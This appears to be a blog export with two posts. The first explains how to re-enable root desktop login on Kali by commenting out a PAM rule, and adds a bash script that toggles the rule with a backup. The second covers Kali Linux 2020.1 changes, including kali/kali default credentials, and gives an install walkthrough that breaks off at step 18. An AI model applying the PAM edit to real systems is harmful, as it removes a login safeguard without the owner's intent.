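II. Changing the <b>root</b> password only gives you a known password. After booting, <b>root</b> can indeed log in on a text console, but it still cannot log in to <b>X-window</b>. Use nano or vi to edit "<b>/etc/pam.d/gdm-password</b>", comment out the line "<b>auth required pam_succeed_if.so user != root quiet_success</b>", save the file, and reboot.</div>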
<div style="background-color: black; color: white; margin-left: 2em; padding: 0.5em;">
#%PAM-1.0<br />
auth requisite pam_nologin.so<br />
<span style="color: #ea9999;"><b>#</b> auth required pam_succeed_if.so user != root quiet_success <span style="color: lime;"> (comment out this line)</span></span><br />
@include common-auth<br />
auth optional pam_gnome_keyring.so<br />
@include common-account</div>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
<b>III. All done!</b></div>
<div style="margin-left: 2em;">
You can now log in as<span style="font-size: large;"><b> root</b></span> on both the text console and x-window!
</div>
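<div style="margin-left: 2em;">
An added example (not from the original post) that turns the step II edit into a repeatable check: it reports whether the root restriction in a gdm-password file is active, comments it out while keeping a backup, and can restore it once root desktop login is no longer needed. The function names and the sample file are constructed for illustration; point the functions at /etc/pam.d/gdm-password as root to use them on a real system.</div>

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Function names are hypothetical.
# Audits and toggles the PAM rule that refuses root at the GDM login screen.

# The rule quoted in the post, as an extended regex tolerant of extra spacing.
RULE_RE='auth[[:space:]]+required[[:space:]]+pam_succeed_if\.so[[:space:]]+user[[:space:]]+!=[[:space:]]+root([[:space:]]|$)'

# Print the rule's state in FILE: active, commented, absent or unreadable.
gdm_root_rule_state() {
    local file=$1
    if [ ! -r "$file" ]; then
        echo "unreadable"
        return 2
    fi
    if grep -Eq "^[[:space:]]*${RULE_RE}" "$file"; then
        echo "active"       # root is refused at the graphical login
    elif grep -Eq "^[[:space:]]*#+[[:space:]]*${RULE_RE}" "$file"; then
        echo "commented"    # restriction lifted, as after step II
    else
        echo "absent"
    fi
}

# Comment the rule out (step II). The previous content is kept in FILE.bak.
gdm_root_rule_disable() {
    local file=$1
    [ "$(gdm_root_rule_state "$file")" = "active" ] || return 0
    cp -p -- "$file" "$file.bak" || return 1
    # Rewrite FILE from the backup so its owner and mode stay unchanged.
    sed -E "s/^([[:space:]]*)(${RULE_RE})/\1# \2/" "$file.bak" > "$file"
}

# Put the restriction back by removing the leading '#'.
gdm_root_rule_enable() {
    local file=$1
    [ "$(gdm_root_rule_state "$file")" = "commented" ] || return 0
    cp -p -- "$file" "$file.bak" || return 1
    sed -E "s/^([[:space:]]*)#+[[:space:]]*(${RULE_RE})/\1\2/" "$file.bak" > "$file"
}

# Constructed sample: the lines shown in the post, before the edit.
write_sample() {
    cat > "$1" <<'EOF'
#%PAM-1.0
auth requisite pam_nologin.so
auth required pam_succeed_if.so user != root quiet_success
@include common-auth
auth optional pam_gnome_keyring.so
@include common-account
EOF
}

# Walk the sample through disable and enable, printing each state.
demo() {
    local dir
    dir=$(mktemp -d) || return 1
    write_sample "$dir/gdm-password"
    echo "before : $(gdm_root_rule_state "$dir/gdm-password")"
    gdm_root_rule_disable "$dir/gdm-password"
    echo "after  : $(gdm_root_rule_state "$dir/gdm-password")"
    diff "$dir/gdm-password.bak" "$dir/gdm-password" || true
    gdm_root_rule_enable "$dir/gdm-password"
    echo "restore: $(gdm_root_rule_state "$dir/gdm-password")"
    rm -rf "$dir"
}

demo
```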
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-19115650611807837382020-02-15T16:57:00.000+08:002020-02-15T16:57:02.218+08:00Kali Linux Penetration Testing Tools (3rd Edition): Supplementary Notes for Chapter 2, "Installing Kali Linux"<div style="border: #0000cc 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin: 0.5em 0; text-indent: 2em;">
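<a href="https://atic-tw.blogspot.com/2019/12/kali-linux-20191225.html" target="_blank"><b>Kali Linux Penetration Testing Tools (3rd Edition)</b></a> was written against Kali 2019.2 and 2019.3, but right after it went to press Kali released 2019.4, followed by the<b> 2020.1</b> release on<b> 2020.1.28</b>. The default environment of these two releases differs slightly from earlier versions, so <span style="color: #660000;">parts of Chapter 2 of the book may not apply</span> and readers must adjust according to their version. <span style="color: #990000;"><b>This post summarizes the changes in 2020.1</b></span>.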
</div>
<div style="margin: 0.5em 0; text-indent: 2em;">
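<span style="font-size: large;"><b>First</b></span>, the change with direct impact: <b>the default x-window desktop has changed from <span style="color: blue;">GNOME</span> to <span style="color: #274e13;">Xfce</span></b>. Xfce is said to use fewer resources, and for penetration testers resource usage matters more than a pretty screen. Those who are used to GNOME can still install it separately.<br />
apt update && apt upgrade -y<br />
<b>apt install gnome</b>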
</div>
<div style="margin: 0.5em 0 0.5em 0; text-indent: 2em;">
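<span style="font-size: large;"><b>Next</b></span>, <span style="color: #990000;"><b>the default credentials in Live mode have changed from root / toor to kali / kali</b></span>, and 2020.1 no longer provides a root account. According to Kali's official explanation, fewer and fewer tools need root privileges, and some tools even require running as non-root (such as chrome). However, some nmap features still need root to work properly, for example the "-sS" option: nmap uses -sS by default to probe whether ports are open or closed, but when not running as root it switches to a -sT scan.</div>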
<div style="margin: 0.5em 0 0 0;">
<span style="color: #0c343d; font-size: large;"><b>Other changes in 2020.1:</b></span>
</div>
<div style="margin: 0.5em 0 0.5em 4em; text-indent: -2em;">
Installation images for different desktops are no longer provided; only 3 variants remain (each in 32bit/64bit): Installer, Live, and NetInstaller.
</div>
<div style="margin-left: 7em; text-indent: -3em;">
<span style="color: #660000;"><b>Installer</b></span>: can be installed offline. The tools are already included, but the user must choose what to install during installation.
</div>
<div style="margin-left: 7em; text-indent: -3em;">
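<span style="color: #660000;"><b>NetInstaller</b></span>: online installation. Only the essential core needs to be downloaded; the rest is fetched from the network during installation.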
</div>
<div style="margin-left: 7em; text-indent: -3em;">
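<span style="color: #660000;"><b>Live</b></span>: the same as the earlier Live edition; it can be written to a DVD or USB drive. As mentioned above, its username and password are now kali/kali, no longer root/toor.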
</div>
<div style="margin: 0.5em 0 0.5em 4em; text-indent: -2em;">
<b>The <span style="color: #cc0000;">undercover</span> feature, which had to be installed separately in 2019.4, is built in as of 2020.1</b>, but it can only be used in the xfce environment.</div>
<div style="margin-left: 2em;">
If your Kali does not have the undercover feature, run "<b>sudo apt install kali-undercover</b>" to install it.<br />
You can then run "<b>kali-undercover</b>" in a terminal to switch it on or off.</div>
<div style="margin: 0.5em 0 0 0;">
<span style="color: #0c343d; font-size: large;"><b>Installation walkthrough for the 2020.1 Installer image:</b></span>
</div>
<div style="margin: 0.5em 0 0 2em;">
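Create a virtual machine as described in section 2.1 of the book, and attach the downloaded "kali-linux-2020.1-installer-amd64.iso" to the virtual machine's optical drive. When the virtual machine starts, it boots from the optical drive into the installer, where you can choose <b>Graphical Install</b> (graphical installer) or Install (text-mode installer); the two follow a similar process:</div>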
<div style="margin-left: 2em; text-indent: -2em;">
<b>1. This walkthrough uses Graphical Install (Figure 1)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqGZMJOk_Sf13U5EAnIpLfhGKH8XLfzf7ezGU1OWJwKdGw04a_HWuQsu6M_3Yy5XYdAeEKW3G2QVoxVzxQ_RJRoHfYekNm_BZB7gDqjlvi6__hpegECnZLSgtbzyBArW__YkdEGdGteZwc/s1600/kali-2020_01.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="487" data-original-width="647" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqGZMJOk_Sf13U5EAnIpLfhGKH8XLfzf7ezGU1OWJwKdGw04a_HWuQsu6M_3Yy5XYdAeEKW3G2QVoxVzxQ_RJRoHfYekNm_BZB7gDqjlvi6__hpegECnZLSgtbzyBArW__YkdEGdGteZwc/s400/kali-2020_01.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Choose Graphical Install to install with the graphical interface</td></tr>
</tbody></table>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
<b>2. The language defaults to English; here it is changed to Chinese (Traditional) 中文(繁體) (Figure 2)</b> </div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZCT1KuOdy8PVYqzlMoT5RBV5_1FTd_btzPrcYiNEbTIUdKEJ9TuE3B0t27UoJ4ZayAI7TxN33s_TcURTeAuhr7yjlg0LK4d1duKcE4NMgvJDDWETPy0VRzbyj4U8UPV0w73tDnMeMcYQI/s1600/kali-2020_02.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="605" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZCT1KuOdy8PVYqzlMoT5RBV5_1FTd_btzPrcYiNEbTIUdKEJ9TuE3B0t27UoJ4ZayAI7TxN33s_TcURTeAuhr7yjlg0LK4d1duKcE4NMgvJDDWETPy0VRzbyj4U8UPV0w73tDnMeMcYQI/s400/kali-2020_02.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Select Chinese (Traditional) 中文(繁體)</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>3. Location: Taiwan (Figure 3)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVdPjjBNmfko3MDTLKtSn2eVFbIlQU_WKb3jSxFL40j8LMYIWI1BX3gZ4tfFenlWdWZN6kvu2w1yZJxoyRMkT-lKYnT-7N8I9pQH3jmz03JUlm6YXiP-7_MWQsv9hXZAesVs5mZKhXFo3Z/s1600/kali-2020_03.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="603" data-original-width="802" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVdPjjBNmfko3MDTLKtSn2eVFbIlQU_WKb3jSxFL40j8LMYIWI1BX3gZ4tfFenlWdWZN6kvu2w1yZJxoyRMkT-lKYnT-7N8I9pQH3jmz03JUlm6YXiP-7_MWQsv9hXZAesVs5mZKhXFo3Z/s400/kali-2020_03.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3: Select Taiwan as the location</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>4. Keyboard: English (Figure 4)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinzdMVOBbo80fVYrYqUCbu82QnZQFeYa2uk_2PVHdCYnN5-62Vq7BhsWQYjteKeGa2fqeGM5YaNLSQ6uyhMbVufMIdLCdx1t6VyV2iMiR2HHxO-HL6wN1A-dlh8oRb88x-a6U9sJa9ni8n/s1600/kali-2020_04.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="802" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinzdMVOBbo80fVYrYqUCbu82QnZQFeYa2uk_2PVHdCYnN5-62Vq7BhsWQYjteKeGa2fqeGM5YaNLSQ6uyhMbVufMIdLCdx1t6VyV2iMiR2HHxO-HL6wN1A-dlh8oRb88x-a6U9sJa9ni8n/s400/kali-2020_04.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4: Select English for the keyboard</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>5. The base components are then loaded (Figure 5); just wait for it to finish!</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTEkiJyQP58-FHvbCpfno_MDZ0J-nq_zMcfyMvRaO954fAof2vijg9G6zG9sD6vxJ2V2wjk0e-N5ONFqjVEcaxDSsC5XZbEFyVzuLsyoLtbgcLFPfAjSPGkGbcdeXhbxwxKp4R8FGiGBRW/s1600/kali-2020_05.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="808" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTEkiJyQP58-FHvbCpfno_MDZ0J-nq_zMcfyMvRaO954fAof2vijg9G6zG9sD6vxJ2V2wjk0e-N5ONFqjVEcaxDSsC5XZbEFyVzuLsyoLtbgcLFPfAjSPGkGbcdeXhbxwxKp4R8FGiGBRW/s400/kali-2020_05.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5: Loading the required components</td></tr>
</tbody></table>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
<b>6. Hostname in the network settings: the default is kali and can be changed as needed; here it is changed to kali2020A (Figure 6)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4x90F7dxUoX6Wg3xHaRzHifxCy2q9IqbbuvX-bDxMxHbjlCIzLW6dSzzLBYQMdysp-aTps73hX8z_CR6weCyWwNP-8gRA4GlZdLoS4dokUwcbpvhI-VLKdAEvu4PGjeR2ld9fWiSWZsh/s1600/kali-2020_06.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4x90F7dxUoX6Wg3xHaRzHifxCy2q9IqbbuvX-bDxMxHbjlCIzLW6dSzzLBYQMdysp-aTps73hX8z_CR6weCyWwNP-8gRA4GlZdLoS4dokUwcbpvhI-VLKdAEvu4PGjeR2ld9fWiSWZsh/s400/kali-2020_06.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6: Set the computer name</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>7. Domain name: because this is a virtual machine on Windows, it is set to WORKGROUP to match the host's domain. (Figure 7)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVe8zMRJEHKOxWEsWNqHqhnKt83sxMY_Fi6CQioiNssm_uzYPErKJSHHuK-wn7lOHR7g04XLUBhUcbFwjbG42Y3ZFy8Z7DrtpMS-djBU5ppJUBmYCBKS3_NO2-5bVpPydWuOPJmxNhqWMD/s1600/kali-2020_07.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="805" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVe8zMRJEHKOxWEsWNqHqhnKt83sxMY_Fi6CQioiNssm_uzYPErKJSHHuK-wn7lOHR7g04XLUBhUcbFwjbG42Y3ZFy8Z7DrtpMS-djBU5ppJUBmYCBKS3_NO2-5bVpPydWuOPJmxNhqWMD/s400/kali-2020_07.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 7: Set the domain or workgroup name</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
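<b>8. Set the user's name: this is the key point, a non-administrative account is created here in place of root. At the prompt for the new user's full name, enter the user's name, for example "Kea Leeve" (Figure 8)</b></div>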
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmvIqFJonESHl5KRn-FOZVhJARbHbjEs933dCDKC32q-_ZsMEUgK09nrOEy4gn5E2kI-IwaDQpAoxtumRkZHS9M7sX2cJeBL-tW5tAZiec4PYHkiCdsfdxaia1El3GnhhqazTpLzfU3xxz/s1600/kali-2020_08.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmvIqFJonESHl5KRn-FOZVhJARbHbjEs933dCDKC32q-_ZsMEUgK09nrOEy4gn5E2kI-IwaDQpAoxtumRkZHS9M7sX2cJeBL-tW5tAZiec4PYHkiCdsfdxaia1El3GnhhqazTpLzfU3xxz/s400/kali-2020_08.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 8: Enter the user's full name</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>9. Username for your account: this is the login account; following Kali's official guidance, it is named kali (Figure 9)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZMcknop_Q270Jec5asQupx-VEsVFfmu-4-R5-a3tTYREvwCZIRtvGyYmL7HtXfUI3MFkYKfENJ0BCEPpa_o06mXMr1O56aGp6n2Q9PFPIgXEOO6jm4bxoAOeZi293movVSh3c2nyJG-lc/s1600/kali-2020_09.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="612" data-original-width="807" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZMcknop_Q270Jec5asQupx-VEsVFfmu-4-R5-a3tTYREvwCZIRtvGyYmL7HtXfUI3MFkYKfENJ0BCEPpa_o06mXMr1O56aGp6n2Q9PFPIgXEOO6jm4bxoAOeZi293movVSh3c2nyJG-lc/s400/kali-2020_09.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 9: Enter the user's account name</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>10. Set the password: kali (Figure 10)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRLVINN1wWey_Jx9kEiICcZRp7SzgV51VZY2YhsNgOAj1tYWJnXbE-i1cTbw_kRBGgrefsoNSwJcrqJFvnrbR600fjxCIPjQ59xHvvvK-yZPAlNtzdpqLQVwaJy48MeGMLxAStBY5XsqsR/s1600/kali-2020_10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRLVINN1wWey_Jx9kEiICcZRp7SzgV51VZY2YhsNgOAj1tYWJnXbE-i1cTbw_kRBGgrefsoNSwJcrqJFvnrbR600fjxCIPjQ59xHvvvK-yZPAlNtzdpqLQVwaJy48MeGMLxAStBY5XsqsR/s400/kali-2020_10.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 10: Set the user's password</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
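<b>11. Next the time zone and disks are detected, and then disk partitioning begins. Click "Continue" to go to the next screen, then choose "Use entire disk" (Figure 11)</b></div>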
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfugmjtp3S2nVWUJG01pLJqkDDFEFcRULcRyh9NvebeMQaumHTcNA7a1joS5kjU8dh0Zy2bbsQLGchxUZImjVTzvhJB7YLftP3AajPsP4VVjBgjmbuV3y4s4uyEUNCZBtasQuVYJhsdS15/s1600/kali-2020_11.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="806" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfugmjtp3S2nVWUJG01pLJqkDDFEFcRULcRyh9NvebeMQaumHTcNA7a1joS5kjU8dh0Zy2bbsQLGchxUZImjVTzvhJB7YLftP3AajPsP4VVjBgjmbuV3y4s4uyEUNCZBtasQuVYJhsdS15/s400/kali-2020_11.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 11: Choose the partitioning method</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
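<b>12. The next screen selects the disk; since there is only one, click "Continue" to go to the next screen, and there choose "All files in one partition" (Figure 12)</b></div>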
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO5JNUu9I-ikX4qTW1u9UKPM-EufQ9O1GBwO-vh09mMh2vyP4yvNdNtoPlNrt_NvPPsJUrjxlR_3cMDCbNH0yAAFrt0PE1OwW1vRavwHzkEMn7GL6z7jUJFBlfCOTlFSpYbvN0oU115oJ_/s1600/kali-2020_12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="806" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO5JNUu9I-ikX4qTW1u9UKPM-EufQ9O1GBwO-vh09mMh2vyP4yvNdNtoPlNrt_NvPPsJUrjxlR_3cMDCbNH0yAAFrt0PE1OwW1vRavwHzkEMn7GL6z7jUJFBlfCOTlFSpYbvN0oU115oJ_/s400/kali-2020_12.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 12: Put all files in one partition</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>13. The next screen confirms the partitioning choices; if everything looks right, click "Continue"! (Figure 13)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0sL8fRbHKe7WBm65kxrbl8HUFcHNqZJ8FbfqdW0eUahXlwkFLSeKXNuiwPjTWJ_v9OjIXY95uC1pICTEKZpx5vxsb42CBYOhoxIGTxw7H8pDSrZvON73XxHWwZ6lz8TCwmkmARtZPQ1lf/s1600/kali-2020_13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="807" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0sL8fRbHKe7WBm65kxrbl8HUFcHNqZJ8FbfqdW0eUahXlwkFLSeKXNuiwPjTWJ_v9OjIXY95uC1pICTEKZpx5vxsb42CBYOhoxIGTxw7H8pDSrZvON73XxHWwZ6lz8TCwmkmARtZPQ1lf/s400/kali-2020_13.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 13: Confirm that the partition settings are correct</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>14. The last partitioning step writes the partitioning choices to disk; remember to select <span style="background-color: yellow;">"Yes"</span> here (Figure 14) (the default selection is "No")</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jx730cpkt24WwXcIfqa8nWuoFFhAx2ekOm6Da57NBKpbGb-T7irxpJsMJqre7MeVbiApudY5yHG9BrZg0hqDtvhbJeymAWuHyDOXjsyVGCAJWI54Eydx6Txi9d2sN2PQlj2TmaEkgDr2/s1600/kali-2020_14.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="605" data-original-width="807" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jx730cpkt24WwXcIfqa8nWuoFFhAx2ekOm6Da57NBKpbGb-T7irxpJsMJqre7MeVbiApudY5yHG9BrZg0hqDtvhbJeymAWuHyDOXjsyVGCAJWI54Eydx6Txi9d2sN2PQlj2TmaEkgDr2/s400/kali-2020_14.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 14: Write the partition information to disk</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
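<b>15. Once partitioning is complete, the base system is installed (Figure 15). All you can do here is wait; when it finishes, the installer moves on to the remaining settings.</b></div>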
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNgZ6ejXHpYTTpu2z3X-IONZAuAsuT9fMLKHUu99vgkundsngFl5Q4PfWetv61V-zuQ9Jy-YoxIKKs971chniKEC8OPx14sdyU6LcMNJwbjGDQwzv42r5J7jaGg0IBGO7kzpQFCCLrQHaj/s1600/kali-2020_15.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="609" data-original-width="809" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNgZ6ejXHpYTTpu2z3X-IONZAuAsuT9fMLKHUu99vgkundsngFl5Q4PfWetv61V-zuQ9Jy-YoxIKKs971chniKEC8OPx14sdyU6LcMNJwbjGDQwzv42r5J7jaGg0IBGO7kzpQFCCLrQHaj/s400/kali-2020_15.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 15: Installing the base system</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
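<b>16. The first screen of the package manager configuration is the HTTP Proxy setting; if you do not go online through a proxy, leave it blank and click "Continue" to go to the next screen (Figure 16).</b></div>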
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgkaJmzd-ZFnGO-UvgP_cgqWx3sQ-jTuV92rirdmF1_VXFIYsOs3QgNFQ4Y5Uj7Vqj-YV5iSxmKoqL7HwWZ0ZETZGk_JHqJksk0jOIqi7sYWIcUQvXIFaXbAKLaooOZ1KRo4LpRmtr5nYE/s1600/kali-2020_16.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="606" data-original-width="804" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgkaJmzd-ZFnGO-UvgP_cgqWx3sQ-jTuV92rirdmF1_VXFIYsOs3QgNFQ4Y5Uj7Vqj-YV5iSxmKoqL7HwWZ0ZETZGk_JHqJksk0jOIqi7sYWIcUQvXIFaXbAKLaooOZ1KRo4LpRmtr5nYE/s400/kali-2020_16.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 16: Set the proxy server for Internet access</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>17. Next, apt (the package manager) is configured and the basic software is installed; please be patient! (Figure 17)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjveOT7-mFsX6spOzTBLcPa78rdqQdKqH-iZVpUTQi5_ADQ7_aYgqurdA6nMbpqR_UZ9Uql6gg6G5ShiBQ6_2CvlqyB_L4AkeolcbxIndqryCRmbv_7RdvuzRMinpgDHqd-NWWPV7dZQS8-/s1600/kali-2020_17.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="809" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjveOT7-mFsX6spOzTBLcPa78rdqQdKqH-iZVpUTQi5_ADQ7_aYgqurdA6nMbpqR_UZ9Uql6gg6G5ShiBQ6_2CvlqyB_L4AkeolcbxIndqryCRmbv_7RdvuzRMinpgDHqd-NWWPV7dZQS8-/s400/kali-2020_17.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 17: Installing the basic software</td></tr>
</tbody></table>
<div style="margin-left: 2em; text-indent: -2em;">
<b>18. Next comes the highlight of the new Kali: the user decides which software to install (Figure 18)</b></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
